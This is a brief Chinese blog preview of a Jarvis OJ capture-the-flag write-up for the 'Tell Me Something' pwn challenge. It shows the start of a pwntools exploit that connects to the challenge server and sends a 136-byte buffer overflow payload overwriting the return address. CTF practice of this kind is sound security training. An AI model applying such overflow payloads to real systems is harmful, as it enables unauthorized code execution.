Jarvis OJ-从Pwn到去世

📝

内容提要

Jarvis OJ-从Pwn到去世 Tell Me Something from pwn import * sh = remote("pwn.jarvisoj.com",9876) payload = 'a'*136 + p64(0x0000000000400620)...

➡️

继续阅读